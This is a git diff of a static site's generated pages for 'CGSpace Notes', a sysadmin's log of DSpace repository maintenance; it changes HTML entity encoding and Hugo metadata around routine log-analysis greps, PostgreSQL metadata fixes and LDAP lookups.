org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &amp;#39;dateIssued_keyword:[1976+TO+1979]&amp;#39;: Encountered &amp;#34; &amp;#34;]&amp;#34; &amp;#34;] &amp;#34;&amp;#34; at line 1, column 32.
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;And there are many of these errors every day for the past month:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;quot;Error while searching for sidebar facets&amp;quot; dspace.log.*
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ grep -c &amp;#34;Error while searching for sidebar facets&amp;#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -1155,12 +1155,12 @@ dspace.log.2018-01-02:34
&lt;ul&gt;
&lt;li&gt;Today there have been no hits by CORE and no alerts from Linode (coincidence?)&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;quot;CORE&amp;quot; /var/log/nginx/access.log
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# grep -c &amp;#34;CORE&amp;#34; /var/log/nginx/access.log
0
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;Generate list of authors on CGSpace for Peter to go through and correct:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &amp;#39;contributor&amp;#39; and qualifier = &amp;#39;author&amp;#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -1289,7 +1289,7 @@ COPY 54701
&lt;li&gt;Remove redundant/duplicate text in the DSpace submission license&lt;/li&gt;
&lt;li&gt;Testing the CMYK patch on a collection with 650 items:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &amp;quot;ImageMagick PDF Thumbnail&amp;quot; -v &amp;gt;&amp;amp; /tmp/filter-media-cmyk.txt
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &amp;#34;ImageMagick PDF Thumbnail&amp;#34; -v &amp;gt;&amp;amp; /tmp/filter-media-cmyk.txt
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -1330,7 +1330,7 @@ COPY 54701
&lt;ul&gt;
&lt;li&gt;An item was mapped twice erroneously again, so I had to remove one of the mappings manually:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# select * from collection2item where item_id = &#39;80278&#39;;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspace=# select * from collection2item where item_id = &amp;#39;80278&amp;#39;;
id | collection_id | item_id
-------+---------------+---------
92551 | 313 | 80278
@ -1370,11 +1370,11 @@ DELETE 1
&lt;li&gt;CGSpace was down for five hours in the morning while I was sleeping&lt;/li&gt;
&lt;li&gt;While looking in the logs for errors, I see tons of warnings about Atmire MQM:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&amp;quot;dc.title&amp;quot;, transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&amp;quot;THUMBNAIL&amp;quot;, transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&amp;quot;-1&amp;quot;, transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&amp;quot;TX157907838689377964651674089851855413607&amp;quot;)
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&amp;#34;dc.title&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&amp;#34;THUMBNAIL&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&amp;#34;-1&amp;#34;, transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&amp;#34;TX157907838689377964651674089851855413607&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;I see thousands of them in the logs for the last few months, so it&amp;rsquo;s not related to the DSpace 5.5 upgrade&lt;/li&gt;
&lt;li&gt;I&amp;rsquo;ve raised a ticket with Atmire to ask&lt;/li&gt;
@ -1429,7 +1429,7 @@ DELETE 1
&lt;li&gt;We had been using &lt;code&gt;DC=ILRI&lt;/code&gt; to determine whether a user was ILRI or not&lt;/li&gt;
&lt;li&gt;It looks like we might be able to use OUs now, instead of DCs:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &amp;quot;dc=cgiarad,dc=org&amp;quot; -D &amp;quot;admigration1@cgiarad.org&amp;quot; -W &amp;quot;(sAMAccountName=admigration1)&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &amp;#34;dc=cgiarad,dc=org&amp;#34; -D &amp;#34;admigration1@cgiarad.org&amp;#34; -W &amp;#34;(sAMAccountName=admigration1)&amp;#34;
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -1465,9 +1465,9 @@ $ git rebase -i dspace-5.5
&lt;li&gt;Add &lt;code&gt;dc.description.sponsorship&lt;/code&gt; to Discovery sidebar facets and make investors clickable in item view (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/232&#34;&gt;#232&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;I think this query should find and replace all authors that have &amp;ldquo;,&amp;rdquo; at the end of their names:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &amp;#39;(^.+?),$&amp;#39;, &amp;#39;\1&amp;#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
UPDATE 95
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
text_value
------------
(0 rows)
@ -1505,7 +1505,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
&lt;li&gt;I have blocked access to the API now&lt;/li&gt;
&lt;li&gt;There are 3,000 IPs accessing the REST API in a 24-hour period!&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# awk &amp;#39;{print $1}&amp;#39; /var/log/nginx/rest.log | uniq | wc -l
3168
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -1603,7 +1603,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
&lt;li&gt;Looks like DSpace exhausted its PostgreSQL connection pool&lt;/li&gt;
&lt;li&gt;Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ psql -c &amp;#39;SELECT * from pg_stat_activity;&amp;#39; | grep idle | grep -c cgspace
78
&lt;/code&gt;&lt;/pre&gt;</description>
</item>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -221,17 +221,17 @@
<li>I had a call with CodeObia to discuss the work on OpenRXV</li>
<li>Check the results of the AReS harvesting from last night:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
{
&#34;count&#34; : 100875,
&#34;_shards&#34; : {
&#34;total&#34; : 1,
&#34;successful&#34; : 1,
&#34;skipped&#34; : 0,
&#34;failed&#34; : 0
}
}
</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span> &#34;count&#34; : 100875,
</span></span><span style="display:flex;"><span> &#34;_shards&#34; : {
</span></span><span style="display:flex;"><span> &#34;total&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;successful&#34; : 1,
</span></span><span style="display:flex;"><span> &#34;skipped&#34; : 0,
</span></span><span style="display:flex;"><span> &#34;failed&#34; : 0
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-02/'>Read more →</a>
</article>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -113,17 +113,17 @@
</ul>
</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &quot;[0-9]{1,2}/Oct/2019&quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &#34;[0-9]{1,2}/Oct/2019&#34;
1277694
</code></pre><ul>
<li>So 4.6 million from XMLUI and another 1.2 million from API requests</li>
<li>Let&rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2019-11/'>Read more →</a>
@ -143,7 +143,7 @@
</p>
</header>
2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c 'id,dc.
2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&rsquo;s &ldquo;unneccesary Unicode&rdquo; fix: $ csvcut -c &#39;id,dc.
<a href='https://alanorth.github.io/cgspace-notes/2019-10/'>Read more →</a>
</article>
@ -166,7 +166,7 @@
<li>Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning</li>
<li>Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -177,7 +177,7 @@
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -338,16 +338,16 @@ DELETE 1
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep 'Spore-192-EN-web.pdf' | grep -E '(18.196.196.108|18.195.78.144|18.195.218.6)' | awk '{print $9}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
</code></pre><ul>
<li>In the last two weeks there have been 47,000 downloads of this <em>same exact PDF</em> by these three IP addresses</li>
<li>Apply country and region corrections and deletions on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p 'fuuu' -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p 'fuuu' -m 231 -f cg.coverage.region -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2019-04/'>Read more →</a>
</article>
@ -403,7 +403,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!</li>
<li>The top IPs before, during, and after this latest alert tonight were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;01/Feb/2019:(17|18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;01/Feb/2019:(17|18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -419,7 +419,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
<li>The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase</li>
<li>There were just over 3 million accesses in the nginx logs last month:</li>
</ul>
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Jan/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Jan/2019&#34;
3018243
real 0m19.873s

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -110,7 +110,7 @@
<li>Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning</li>
<li>I don&rsquo;t see anything interesting in the web server logs around that time though:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;02/Jan/2019:0(1|2|3)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;02/Jan/2019:0(1|2|3)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -308,7 +308,7 @@
<li>I added the new CCAFS Phase II Project Tag <code>PII-FP1_PACCA2</code> and merged it into the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/379">#379</a>)</li>
<li>I proofed and tested the ILRI author corrections that Peter sent back to me this week:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
</code></pre><ul>
<li>I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in <a href="/cgspace-notes/2018-03/">March, 2018</a></li>
<li>Time to index ~70,000 items on CGSpace:</li>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -166,11 +166,11 @@
<li>I notice this error quite a few times in dspace.log:</li>
</ul>
<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>And there are many of these errors every day for the past month:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -266,12 +266,12 @@ dspace.log.2018-01-02:34
<ul>
<li>Today there have been no hits by CORE and no alerts from Linode (coincidence?)</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;CORE&quot; /var/log/nginx/access.log
<pre tabindex="0"><code># grep -c &#34;CORE&#34; /var/log/nginx/access.log
0
</code></pre><ul>
<li>Generate list of authors on CGSpace for Peter to go through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
COPY 54701
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2017-11/'>Read more →</a>

View File

@ -10,14 +10,14 @@
<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
<meta property="og:type" content="website" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/" />
<meta property="og:updated_time" content="2022-03-01T17:17:27+03:00" />
<meta property="og:updated_time" content="2022-03-01T17:48:40+03:00" />
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="CGSpace Notes"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -151,7 +151,7 @@
<li>Remove redundant/duplicate text in the DSpace submission license</li>
<li>Testing the CMYK patch on a collection with 650 items:</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre>
<a href='https://alanorth.github.io/cgspace-notes/2017-04/'>Read more →</a>
</article>
@ -210,7 +210,7 @@
<ul>
<li>An item was mapped twice erroneously again, so I had to remove one of the mappings manually:</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = '80278';
<pre tabindex="0"><code>dspace=# select * from collection2item where item_id = &#39;80278&#39;;
id | collection_id | item_id
-------+---------------+---------
92551 | 313 | 80278
@ -268,11 +268,11 @@ DELETE 1
<li>CGSpace was down for five hours in the morning while I was sleeping</li>
<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
</ul>
